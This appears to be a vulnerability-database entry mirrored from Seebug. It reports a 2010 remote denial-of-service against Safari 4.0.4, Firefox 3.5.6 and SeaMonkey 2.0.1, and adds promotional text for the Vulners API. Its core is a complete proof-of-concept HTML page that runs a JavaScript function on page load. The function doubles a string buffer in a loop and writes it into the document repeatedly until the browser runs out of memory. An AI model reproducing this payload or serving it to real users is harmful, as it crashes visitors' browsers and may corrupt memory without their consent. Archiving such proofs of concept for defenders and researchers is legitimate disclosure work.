Lucene search
K

Safari v4.0.4, Firefox v3.5.6, SeaMonkey v2.0.1 Remote Denial of Service

🗓️ 08 Feb 2010 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 9 Views

Safari, Firefox, SeaMonkey Remote Denial of Service vulnerability

Code

                                                <!--
Safari 4.0.4 Remote Denial of Service (With Possible Memory Corruption With OOM)
 
Firefox 3.5.6
Safari 4.0.4
SeaMonkey 2.0.1
 
Author : 599eme Man
Contact : [email protected]
 
-->
 
<body onload="javascript:DoS();"></body>
 
<script>
 
function DoS() {
 
var buffer = 'A';
for (i =0;i<150;i++) {
buffer+=buffer+'A';
document.write('<html><marquee><h1>'+buffer+buffer);
}
 
}
 
</script>
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation